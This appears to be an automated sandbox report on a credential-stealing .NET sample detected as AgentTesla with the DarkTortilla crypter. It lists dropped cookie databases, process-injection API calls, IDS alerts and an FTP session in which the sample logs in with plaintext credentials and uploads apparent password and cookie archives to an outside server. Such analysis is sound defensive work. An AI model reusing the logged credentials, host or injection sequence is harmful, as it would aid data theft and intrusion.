                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\zi5iuluf.pn2\Edge Chromium\Default\Network\Cookies

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\zi5iuluf.pn2\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.172396528538381
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:Xc501VOacR.exe
                              File size:832'512 bytes
                              MD5:08939a7fe1905c0c6e321e4e2cd90cad
                              SHA1:c463953c5f52e9bc0137513d69aa9294d84bde75
                              SHA256:61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c
                              SHA512:4cd3877461ae15143636fff08dc3dec2587451b45dc32857a5bc0dde53068f0b76158eb0e1519f401b93bd4e1c3e6c73144c83b9d59d406d8c0f011b4211e19e
                              SSDEEP:12288:+WB3yuZG8+De1kIse8LRWjrZCollIoNE8kgZu3pvK541rR:+WB3yuZGVteKRyjl6ikyCpvy41rR
                              TLSH:C205F18D03FC5AA0F67E1BB6C57621444B79B407B872E35C46C090FA9E73BE19992723
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................^.... ........@.. ....................... ............`................................

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x4cca5e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x670F2EDD [Wed Oct 16 03:11:25 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcca080x53.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x3bc.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xcaa640xcac00ac9c90ea508f45f9fc21f4a54fe28168False0.7664763313039458data7.180225181330332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xce0000x3bc0x400a184d21672e45ed80b966123db680911False0.416015625data3.2879534986852215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd00000xc0x200898c66a0f79080e4bd5444aa28d3eb1bFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xce0580x364data0.44930875576036866

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-05T17:23:33.528204+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549830162.241.203.3021TCP
                              2024-12-05T17:23:34.458512+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549839162.241.203.3031261TCP
                              2024-12-05T17:23:34.578813+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549839162.241.203.3031261TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:23:29.929363012 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:30.051827908 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:30.051950932 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:31.216428041 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:31.220483065 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:31.340378046 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:31.552659988 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:31.552870035 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:31.672677994 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:31.988568068 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:31.988830090 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:32.108639956 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:32.320930004 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:32.321100950 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:32.443795919 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:32.656141996 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:32.656347990 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:32.778851032 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:33.058692932 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:33.059340954 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:33.179215908 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:33.407402992 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:33.408159018 CET4983931261192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:33.459860086 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:33.528017044 CET3126149839162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:33.528107882 CET4983931261192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:33.528203964 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:33.647989035 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:34.458266020 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:34.458512068 CET4983931261192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.458585978 CET4983931261192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.506769896 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.578353882 CET3126149839162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:34.578743935 CET3126149839162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:34.578813076 CET4983931261192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.794064999 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:34.834839106 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.845534086 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:34.965620995 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:35.178128958 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:35.178561926 CET4984331714192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:35.225495100 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:35.298357964 CET3171449843162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:35.298522949 CET4984331714192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:35.298599958 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:35.419284105 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.231868982 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.232080936 CET4984331714192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:36.232117891 CET4984331714192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:36.272425890 CET4983021192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:36.351897955 CET3171449843162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.351974964 CET3171449843162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.351984978 CET3171449843162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.352466106 CET3171449843162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.352623940 CET4984331714192.168.2.5162.241.203.30
                              Dec 5, 2024 17:23:36.564851999 CET2149830162.241.203.30192.168.2.5
                              Dec 5, 2024 17:23:36.616097927 CET4983021192.168.2.5162.241.203.30

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:23:29.778970003 CET6177453192.168.2.51.1.1.1
                              Dec 5, 2024 17:23:29.917587996 CET53617741.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:23:29.778970003 CET192.168.2.51.1.1.10xf73Standard query (0)ftp.aminhacorretora.com.brA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:23:29.917587996 CET1.1.1.1192.168.2.50xf73No error (0)ftp.aminhacorretora.com.braminhacorretora.com.brCNAME (Canonical name)IN (0x0001)false
                              Dec 5, 2024 17:23:29.917587996 CET1.1.1.1192.168.2.50xf73No error (0)aminhacorretora.com.br162.241.203.30A (IP address)IN (0x0001)false

                              FTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              Dec 5, 2024 17:23:31.216428041 CET2149830162.241.203.30192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21.220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 150 allowed.220-Local time is now 13:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:23:31.220483065 CET4983021192.168.2.5162.241.203.30USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:23:31.552659988 CET2149830162.241.203.30192.168.2.5331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:23:31.552870035 CET4983021192.168.2.5162.241.203.30PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:23:31.988568068 CET2149830162.241.203.30192.168.2.5230 OK. Current restricted directory is /
                              Dec 5, 2024 17:23:32.320930004 CET2149830162.241.203.30192.168.2.5504 Unknown command
                              Dec 5, 2024 17:23:32.321100950 CET4983021192.168.2.5162.241.203.30PWD
                              Dec 5, 2024 17:23:32.656141996 CET2149830162.241.203.30192.168.2.5257 "/" is your current location
                              Dec 5, 2024 17:23:32.656347990 CET4983021192.168.2.5162.241.203.30TYPE I
                              Dec 5, 2024 17:23:33.058692932 CET2149830162.241.203.30192.168.2.5200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:23:33.059340954 CET4983021192.168.2.5162.241.203.30PASV
                              Dec 5, 2024 17:23:33.407402992 CET2149830162.241.203.30192.168.2.5227 Entering Passive Mode (162,241,203,30,122,29)
                              Dec 5, 2024 17:23:33.528203964 CET4983021192.168.2.5162.241.203.30STOR PW_user-376483_2024_12_05_11_23_28.html
                              Dec 5, 2024 17:23:34.458266020 CET2149830162.241.203.30192.168.2.5150 Accepted data connection
                              Dec 5, 2024 17:23:34.794064999 CET2149830162.241.203.30192.168.2.5226-File successfully transferred
                              226-File successfully transferred226 0.336 seconds (measured here), 0.93 Kbytes per second
                              Dec 5, 2024 17:23:34.845534086 CET4983021192.168.2.5162.241.203.30PASV
                              Dec 5, 2024 17:23:35.178128958 CET2149830162.241.203.30192.168.2.5227 Entering Passive Mode (162,241,203,30,123,226)
                              Dec 5, 2024 17:23:35.298599958 CET4983021192.168.2.5162.241.203.30STOR CO_user-376483_2024_12_05_11_23_33.zip
                              Dec 5, 2024 17:23:36.231868982 CET2149830162.241.203.30192.168.2.5150 Accepted data connection
                              Dec 5, 2024 17:23:36.564851999 CET2149830162.241.203.30192.168.2.5226-File successfully transferred
                              226-File successfully transferred226 0.335 seconds (measured here), 9.97 Kbytes per second

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:11:22:18
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\Xc501VOacR.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Xc501VOacR.exe"
                              Imagebase:0x5a0000
                              File size:832'512 bytes
                              MD5 hash:08939A7FE1905C0C6E321E4E2CD90CAD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:4
                              Start time:11:22:52
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xa50000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:14%
                                Dynamic/Decrypted Code Coverage:97.7%
                                Signature Coverage:5.3%
                                Total number of Nodes:132
                                Total number of Limit Nodes:6
                                execution_graph 78304 1251a40 CloseHandle 78305 1251aa7 78304->78305 78306 747ada0 78307 747adb4 78306->78307 78308 747ae2d 78307->78308 78317 78c35ec 78307->78317 78321 78c2da1 78307->78321 78326 78c3597 78307->78326 78330 78c2e00 78307->78330 78334 78c2aeb 78307->78334 78338 78c4527 78307->78338 78342 78c377d 78307->78342 78346 78c2c9d 78307->78346 78350 78c4a40 78317->78350 78354 78c4a48 78317->78354 78318 78c362a 78322 78c2d96 78321->78322 78322->78321 78323 78c2e13 78322->78323 78324 78c4a48 VirtualProtect 78322->78324 78325 78c4a40 VirtualProtect 78322->78325 78324->78323 78325->78323 78328 78c4a48 VirtualProtect 78326->78328 78329 78c4a40 VirtualProtect 78326->78329 78327 78c35ab 78328->78327 78329->78327 78332 78c4a48 VirtualProtect 78330->78332 78333 78c4a40 VirtualProtect 78330->78333 78331 78c2e13 78332->78331 78333->78331 78336 78c4a48 VirtualProtect 78334->78336 78337 78c4a40 VirtualProtect 78334->78337 78335 78c2afc 78336->78335 78337->78335 78340 78c4a48 VirtualProtect 78338->78340 78341 78c4a40 VirtualProtect 78338->78341 78339 78c4538 78340->78339 78341->78339 78344 78c4a48 VirtualProtect 78342->78344 78345 78c4a40 VirtualProtect 78342->78345 78343 78c3797 78344->78343 78345->78343 78348 78c4a48 VirtualProtect 78346->78348 78349 78c4a40 VirtualProtect 78346->78349 78347 78c2cc1 78348->78347 78349->78347 78351 78c4a48 VirtualProtect 78350->78351 78353 78c4aca 78351->78353 78353->78318 78355 78c4a90 VirtualProtect 78354->78355 78356 78c4aca 78355->78356 78356->78318 78215 2b5d01c 78216 2b5d034 78215->78216 78217 2b5d08e 78216->78217 78222 6011530 78216->78222 78226 6010aa4 78216->78226 78234 6012278 78216->78234 78242 6011521 78216->78242 78223 6011556 78222->78223 78224 6010aa4 CallWindowProcW 78223->78224 78225 6011577 78224->78225 78225->78217 78227 6010aaf 78226->78227 78228 60122e9 78227->78228 78230 60122d9 78227->78230 78256 6010bcc 78228->78256 78246 6012410 78230->78246 78251 6012400 78230->78251 78231 60122e7 78235 6012288 78234->78235 78236 60122e9 78235->78236 78239 60122d9 78235->78239 78237 6010bcc CallWindowProcW 78236->78237 78238 60122e7 78237->78238 78240 6012400 CallWindowProcW 78239->78240 78241 6012410 CallWindowProcW 78239->78241 78240->78238 78241->78238 78243 601152a 78242->78243 78244 6010aa4 CallWindowProcW 78243->78244 78245 6011577 78244->78245 78245->78217 78247 6012424 78246->78247 78260 60124b7 78247->78260 78264 60124c8 78247->78264 78248 60124b0 78248->78231 78253 6012410 78251->78253 78252 60124b0 78252->78231 78254 60124b7 CallWindowProcW 78253->78254 78255 60124c8 CallWindowProcW 78253->78255 78254->78252 78255->78252 78257 6010bd7 78256->78257 78258 60139ca CallWindowProcW 78257->78258 78259 6013979 78257->78259 78258->78259 78259->78231 78261 60124c8 78260->78261 78262 60124d9 78261->78262 78267 6013901 78261->78267 78262->78248 78265 60124d9 78264->78265 78266 6013901 CallWindowProcW 78264->78266 78265->78248 78266->78265 78268 6010bcc CallWindowProcW 78267->78268 78269 601391a 78268->78269 78269->78262 78199 78cdf00 78200 78cdf40 VirtualAllocEx 78199->78200 78202 78cdf7d 78200->78202 78294 78ce640 78295 78ce688 WriteProcessMemory 78294->78295 78297 78ce6df 78295->78297 78203 78cf298 78204 78cf2d8 ResumeThread 78203->78204 78206 78cf309 78204->78206 78207 78cd818 78208 78cd85d Wow64GetThreadContext 78207->78208 78210 78cd8a5 78208->78210 78270 78c6eb8 78271 78c6e93 78270->78271 78272 78c6ebe 78270->78272 78273 78c7329 78272->78273 78275 78c98d0 78272->78275 78277 78c98f7 78275->78277 78276 78c99bb 78276->78272 78277->78276 78279 78cbc58 78277->78279 78280 78cbcd7 CreateProcessAsUserW 78279->78280 78282 78cbdd8 78280->78282 78283 78cf4b8 78284 78cf643 78283->78284 78286 78cf4de 78283->78286 78286->78284 78287 78ce138 78286->78287 78288 78cf738 PostMessageW 78287->78288 78289 78cf7a4 78288->78289 78289->78286 78298 535cd60 DuplicateHandle 78299 535cdf6 78298->78299 78357 6011378 78358 60113e0 CreateWindowExW 78357->78358 78360 601149c 78358->78360 78300 823c5f8 78301 823c63e DeleteFileW 78300->78301 78303 823c677 78301->78303 78211 78ced90 78212 78cedd8 VirtualProtectEx 78211->78212 78214 78cee16 78212->78214 78290 78cf030 78291 78cf075 Wow64SetThreadContext 78290->78291 78293 78cf0bd 78291->78293 78361 747be38 78362 747be80 VirtualProtect 78361->78362 78363 747beba 78362->78363

                                Executed Functions

                                Function 082306E0 Relevance: 11.0, Strings: 8, Instructions: 984COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 82306e0-82306ff 1 8230705-823070b 0->1 2 82308ad-82308fe 0->2 3 823070d-8230714 1->3 4 823074c-8230760 1->4 27 8230900-823090d 2->27 28 8230918-8230932 2->28 5 8230716-8230723 3->5 6 823072e-8230747 call 8230074 3->6 8 8230782-823078b 4->8 9 8230762-8230766 4->9 5->6 6->4 11 82307a5-82307c1 8->11 12 823078d-823079a 8->12 9->8 10 8230768-8230774 9->10 10->8 20 8230776-823077c 10->20 24 82307c7-82307d2 11->24 25 8230869-823088d 11->25 12->11 20->8 31 82307d4-82307da 24->31 32 82307ea-82307f1 24->32 41 8230897 25->41 42 823088f 25->42 27->28 37 8230934-823093b 28->37 38 8230979-8230980 28->38 35 82307de-82307e0 31->35 36 82307dc 31->36 39 82307f3-82307fd 32->39 40 8230805-8230828 32->40 35->32 36->32 45 8230955-823096a 37->45 46 823093d-823094a 37->46 43 8230982-823098f 38->43 44 823099a-82309a3 38->44 39->40 55 823082a-8230837 40->55 56 8230839-823084a 40->56 41->2 42->41 43->44 47 82309a5-82309a7 44->47 48 82309a9-82309ac 44->48 45->38 57 823096c-8230973 45->57 46->45 52 82309ad-82309b1 47->52 48->52 60 82309b9-82309be 52->60 55->56 62 8230857-8230863 55->62 56->62 63 823084c-823084f 56->63 57->38 61 8230a07-8230a32 57->61 64 8230a01-8230a04 60->64 65 82309c0-82309c7 60->65 75 8230a39-8230a72 61->75 62->24 62->25 63->62 66 82309e1-82309f6 65->66 67 82309c9-82309d6 65->67 66->64 73 82309f8-82309ff 66->73 67->66 73->64 73->75 82 8230a74-8230a7a 75->82 83 8230a7b-8230a7e 75->83 82->83 84 8230a83-8230a9a 82->84 83->84 85 8230ab2-8230ab8 84->85 86 8230a9c-8230aaf 84->86 87 8230aba-8230ac1 85->87 88 8230b28-8230b80 85->88 89 8230b87-8230bdf 87->89 90 8230ac7-8230ad7 87->90 88->89 95 8230be6-8230cc8 89->95 90->95 96 8230add-8230ae1 90->96 138 8230cca 95->138 139 8230d48-8230d9e 95->139 99 8230ae4-8230ae6 96->99 102 8230b0b-8230b0d 99->102 103 8230ae8-8230af8 99->103 104 8230b0f-8230b19 102->104 105 8230b1c-8230b25 102->105 110 8230ae3 103->110 111 8230afa-8230b09 103->111 110->99 111->102 111->110 140 8230cd3-8230cd6 138->140 141 8230ccc-8230cd2 138->141 148 8230da5-8230e74 139->148 142 8230cdb-8230cf4 140->142 141->140 141->142 144 8230d46 142->144 145 8230cf6-8230d06 142->145 144->139 145->148 149 8230d0c-8230d10 